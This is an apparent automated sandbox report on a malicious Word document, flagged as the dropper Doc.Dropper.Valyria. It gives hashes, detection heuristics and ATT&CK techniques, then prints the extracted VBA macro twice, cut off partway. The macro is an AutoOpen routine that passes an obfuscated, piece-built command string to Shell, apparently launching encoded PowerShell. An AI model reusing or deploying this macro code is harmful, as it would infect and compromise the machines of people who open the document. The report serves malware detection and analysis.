Office (OLE) malware analysis — malicious · bc282d43e2bc9872

MALICIOUS

Office (OLE)

120.8 KB Created: 2018-08-15 23:06:00 Authoring application: Microsoft Office Word First seen: 2020-06-01

MD5: 45d22aeb28c57063ebccac172f13ea2c SHA-1: 18e8fd4ebcd1217853b16f083cbf35ccf1645a7b SHA-256: bc282d43e2bc9872d8ccfb59691632cbf17c87d6e3e284835714d2127f78155a

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is configured to execute a command using the Shell() function, which is a critical finding. The ClamAV detection name 'Doc.Dropper.Valyria-6668100-0' suggests it acts as a dropper for further malicious payloads. The obfuscated script makes it difficult to determine the exact payload, but the intent is clearly to execute arbitrary commands.

Heuristics 7

ClamAV: Doc.Dropper.Valyria-6668100-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6668100-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14202 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14202 bytes
SHA-256: `9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DlLVColizzEq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next Hour Sqr(hMJhB) Hour 40 Error Atn(1) Error CCur(VIPhP) Hour 1 Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644 Hour CDate(BXjnr) Error 8 End Sub Attribute VB_Name = "iHJjMWjDQSX" Function UBitRZz() On Error Resume Next Error Str(60383 * 74581 + aFqLTl / 26537) Error 1085 sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + " " + " " + " " Hour CStr(ozlBQr) Error TimeValue(1) jKlpHQ = " " + " " + " " + " " + " " + " " + " " + " " + "/c" Hour 9 Hour 508 bJFviRjvGM = " " + " " + " " + " " + " " + " " + " " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " " Hour CDbl(Chjzmf / qmsts) Error Int(587) iiziz = "s" + "E" + "t " + " } " + " " Hour Hex(PTEsFO - bwfAu) Error Round(7) odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA" Error Cos(100) Error 48 SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0" Error FJCrf Error CDec(33) Hour TimeValue(EOCcRo + FsIki) jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A" Hour RMBjpu Error LCase(10409 - HfWZU / aYZAGv + 2002) Error 770 tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M" UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs Hour LEQca Hour CVar(62) End Function Function KiiqiSjUM() On Error Resume Next Error vOjbSk Error 8 Error 431 iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0" Error LNNMW Error TEsaRO Hour CByte(96) wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF" Error 6 Hour 99 Hour Sqr(632) QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$" Hour CDate(93077 * nXfiCf) Hour Tan(3891) WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA" Hour tjcBh Error Int(jfjHMq) Hour 319432244 THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A" Error Int(5) Error 379512492 mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ" Error Sqr(BhXQU + mLvAFH) Hour Sgn(859) Hour Val(jnBLSk) kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A" Error 256125246 Error Fix(24427 * mqvvK) iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E" Error ZBzjXu Error YhzMq ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn" Error Rnd(WqpEZ) Error Int(2211) KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A" Hour Cos(mpsFkj + LwTcI) Hour Str(7557 + dzqBod / rEvjaK / XLlpd) rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B" Error CDec(570) Error Int(428575136) Error Log(IGbDzL) dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA" Error mrKww Error XStoZ SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg" KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv Hour 42 Hour Sin(57135 * FcGSwE + 52046 / lhXUom) End Function Function PRPpATiF() On Error Resume Next Hour Sqr(16449 - 1338) Error CDate(4895) zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab" Hour LCase(1) Hour Log(6) Error 198 GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B ... (truncated)

SHA-256: 9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DlLVColizzEq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   Hour Sqr(hMJhB)
   Hour 40
   Error Atn(1)
   Error CCur(VIPhP)
   Hour 1
Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644
   Hour CDate(BXjnr)
   Error 8
End Sub


Attribute VB_Name = "iHJjMWjDQSX"
Function UBitRZz()
On Error Resume Next
Error Str(60383 * 74581 + aFqLTl / 26537)
   Error 1085
sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + "  " + " " + "   "
Hour CStr(ozlBQr)
   Error TimeValue(1)
jKlpHQ = "   " + " " + "  " + " " + " " + " " + " " + " " + "/c"
Hour 9
   Hour 508
bJFviRjvGM = "  " + "  " + " " + "  " + "  " + " " + "   " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " "
Hour CDbl(Chjzmf / qmsts)
   Error Int(587)
iiziz = "s" + "E" + "t " + " } " + " "
Hour Hex(PTEsFO - bwfAu)
   Error Round(7)
odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA"
Error Cos(100)
   Error 48
SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0"
Error FJCrf
   Error CDec(33)
   Hour TimeValue(EOCcRo + FsIki)
jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A"
Hour RMBjpu
   Error LCase(10409 - HfWZU / aYZAGv + 2002)
   Error 770
tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M"
UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs
   Hour LEQca
   Hour CVar(62)
End Function
Function KiiqiSjUM()
On Error Resume Next
Error vOjbSk
   Error 8
   Error 431
iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0"
Error LNNMW
   Error TEsaRO
   Hour CByte(96)
wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF"
Error 6
   Hour 99
   Hour Sqr(632)
QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$"
Hour CDate(93077 * nXfiCf)
   Hour Tan(3891)
WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA"
Hour tjcBh
   Error Int(jfjHMq)
   Hour 319432244
THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A"
Error Int(5)
   Error 379512492
mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ"
Error Sqr(BhXQU + mLvAFH)
   Hour Sgn(859)
   Hour Val(jnBLSk)
kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A"
Error 256125246
   Error Fix(24427 * mqvvK)
iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E"
Error ZBzjXu
   Error YhzMq
ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn"
Error Rnd(WqpEZ)
   Error Int(2211)
KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A"
Hour Cos(mpsFkj + LwTcI)
   Hour Str(7557 + dzqBod / rEvjaK / XLlpd)
rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B"
Error CDec(570)
   Error Int(428575136)
   Error Log(IGbDzL)
dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA"
Error mrKww
   Error XStoZ
SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg"
KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv
   Hour 42
   Hour Sin(57135 * FcGSwE + 52046 / lhXUom)
End Function
Function PRPpATiF()
On Error Resume Next
Hour Sqr(16449 - 1338)
   Error CDate(4895)
zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab"
Hour LCase(1)
   Hour Log(6)
   Error 198
GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.